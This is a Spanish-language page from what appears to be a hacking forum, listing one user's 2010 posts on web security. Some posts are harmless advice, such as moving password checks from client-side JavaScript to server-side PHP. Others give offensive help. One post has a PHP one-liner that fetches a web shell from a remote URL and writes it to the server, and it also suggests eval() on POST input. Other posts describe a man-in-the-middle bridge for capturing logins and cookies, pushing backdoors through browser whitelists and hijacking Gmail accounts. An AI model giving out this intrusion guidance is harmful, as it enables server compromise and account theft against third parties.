Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - WHK

#3241
Nivel Web / Re: Ayuda con pag PHP <= 5.3.2
6 Abril 2010, 19:30 PM
asi como responderte rapido para que llegues y presiones un botón para hacer estallar el servidor no se puede.

Cada bug que has puesto es diferente y todos son explotables de forma local no remota.

Si quieres aprender sobre como funciona cada uno primero que nada debes aprender a programar en php porque de nada sirve saber como atacar un servidor si no sabes como se produce, que pasa o como solucionarlo. Talves te pueda explicar cada uno pero que saco si no vas a entender.

El nesus solo sirve de apoyo para el auditor al igual que el nstalker o el sss pero en ningún caso como un "apunta y dispara", por eso debes saber lenguaje WEB.
#3242
usa un script que guarde otro script y así evitas el problema del tamaño:

Código (php) [Seleccionar]
<?php file_put_contents('shell.php'file_get_contents('http://www.miweb/shell.txt')); ?>

Después cuando lo visualizes el mismo script te va a descargar la shell y ya la hiciste.
Si no te deja bajar nada entonces pruebas con un formulario en un textarea y todo lo que le pases via post lo procesas en eval() y con eso ya puedes experimentar ver archivos con glob(), mover y copiar con move() ver phpinfo(), usar sytem() si es que te deja, etc etc y si puedes sobreescribir archivos entonces hazle un file_put_contents() con la shell en php y ya la hiciste.
#3243
nonononnoo recuerda que un MITM para que sea MITM efectivo no debe haber variación en el código fuente, absolutamente ninguna variación porque si yo entro y veo un iframe en paypal está claro que no me voy a loguear xD, es mejor enviar y recibir los paquetes lo mas fiel posible y si quieres pues captura los datos o modifica solamente lo que sea necesario como textos a mostrar, cookies, etc.

Digamos que cuando loguee le guardas los datos que ingresó en el input en un texto tuyo para despues verlos, o talves capturar su cookie o reemplazarsela por la cookie de una sesión infectada , no se.

Un MITM para que puede ser aprobechada aparte de obtener cuentas y datos agenos?
recuerdas que hay sitios como la descarga de google chrome y los plugines de ie8 que no te piden confirmación para ejecutarlos como si lo hace firefox? eso se debe a que el explorador chrome e ie8 contienen una withelist con urls de los cuales si es permitido ejecutar instaladores y lo que sea sin la necesidad de alguna confirmación, buena puerta para enviar backdoors o rootkits, cuando abra algo le haces un location desde el header de la request hacia la descarga de algun plugin o instalador y ya está.

Dale un vistazo acá:
http://foro.elhacker.net/analisis_y_diseno_de_malware/beefyproxy_mitm_web_con_modificacion_de_contenido-t252828.0.html
#3244
Codear el acceso de algo en html es lo mas inseguro que puede existir ya que el html se ejecuta al lado del cliente.

Lo que debes hacer es crear algún sistema de validación que se ejecute en el servidor (o sea que no lo vea el explorador).

Me explico, digamos que tu html está en un servidor gratuito por ahi, cuando abres tu explorador web ya sea internet explorer, firefox o lo que sea y escribes arriba http://mipagina.com/ lo que hace el explorador es primero conectarse al servidor "mipagina.com" al puerto 80, luego el explorador le envía un texto que es la instrucción y se llama petición, esta petición le indica al servidor que es lo que quieres ver.
cuando tu explorador solicita el archivo html el servidor lo toma y te lo entrega como si fuera un simple texto y tu explorador es el que se encarga de interpretar todo ese texto y dibujar por ejemplo una imagen, que las letras aparezcan de negro o de rojo, etc, eso lo hace el explorador y no el servidor, el servidor solamente te entrega el texto nada mas.

Cuando tu acceso lo haces via html el que interpreta el código de javascript es tu explorador, el servidor solo te entrega el texto nada mas por lo tanto el que se va a encargar de la seguridad de tu acceso en este caso es tu explorador.

Ahora que pasa si yo manipulo mi explorador o me hago un programa que sea similar al explorador para que interprete la clave como yo quiera?, el servidor en este caso perdería el control del acceso y eso es malo, aparte de que cualquiera podería ver el código fuente de la web y observar la contraseña no crees?.

Hay archivos que no son html y son php, cgi, asp, etc, estos archivos se ejecutan al lado del servidor y no del cliente.
Por ejemplo si yo en un archivo php escribo esto:

Código (php) [Seleccionar]
<?php
 
if($_POST['clave'] == 'elhacker.net'){
  echo 
'acceso ok';
 }else{
  echo 
'no tienes acceso';
 }
?>


este código cuando lo abras con tu explorador no se verá, porque el código ya no lo va a interpretar tu explorador sino el servidor, tampoco podrás ver su código fuente asi que el visitante está obligado a pasar por ese validador.

En resumidas, te recomiendo que aprendas otro lenguaje web que sea dinámico (php es el mas fácil) ya que con ese validador que tienes en javascript no vas a llegar a ningún lado.
#3245
lo que necesitas para un MITM es un brigde, entonces cuando por ejemplo yo abra gmail.com la conexión pasará por mi servidor WEB y mi servidor WEB deberá ser capaz de obtener el contenido real de gmail y funcionar commo puente, o sea.. las cookies que recibo deben ser las mismas que envío al igual que cada header.

De esta forma tu servidor WEB es el que tendrá la oportunidad de manipular el contenido del sitio.

Ahora, no necesariamente puedes usar un servidor WEB con un archivo php que sirva de brigde sino que también puedes hacer un ejecutable que se ponga a escucha al puerto 80 y luego que obtenga el header "host: {host aca}" y se conecte a {host aca} al puerto 80 del servidor remoto.

Luego tendrias dos tipos de logs o uno solo si lo prefieres al estilo de live headers para firefox.

CitarPeticion solicitada
-----------------------
Peticion respondida
=============

Y desde el mismo programa puedes dejar unos parámetros para modificar el contenido de algo.

Ahora en el caso de google el login va via ssl pero si el brigde es fiel a los paquetes que entrega y envía no habrá problema pero como capturas la contraseña?
al terminar el logueo enviará al usuario a su bandeja de entrada sin https, en ese instante tomas el token anti csrf y le cambias la contraseña de forma automatizada desde el mismo programa o si no solo sirve de monitoreo no se, ahi ves lo que necesites hacer.


[yo] <--> [MITM] <--> [servidor web]
             |
[logueo tráfico y modifico paquetes]   
#3246
comienza aprendiendo lenguaje ensamblador
en los tutos de ricardo navaja enseñan un poco sobre ensamblador pero solo es un repaso sabiendo que ya deberías comprender el lenguaje.
#3247
Nivel Web / Re: Casi es Mio SQL inyection
23 Marzo 2010, 06:10 AM
primero aprende lenguaje sql en mysql y php, despues intenta buscar vulnerabilidades.

http://foro.elhacker.net/nivel_web/iquestcomo_iniciarse_en_la_seguridad_web-t279791.0.html
#3248
buscas la url de publicación web y ahi la subes y ya.
ahora, donde está ese directorio? depende del servidor web, configuración, etc.
generalmente en /var/www, /home/user/public_html, si es apache en linux, etc etc.

pero si tienes acceso al ftp talves te inicie dentro del directorio de usuario asi que solo debes buscar public_html o si no www.
#3249
si tratas de hacer una query corrupta te escribe la query pero si la query no es corrupta pero aun así da error entonces sale mysql_error(), en ese caso se puede deducir que está utilizando mysqli o alguna función que verifica la query antes de ser procesada
#3250
home/usuaris/bisbal/templates_c/contingut.tpl
ese templates_c me recuerda a un post que está mas abajo, me da la impresion de que es el mismo sistema pero estoy inseguro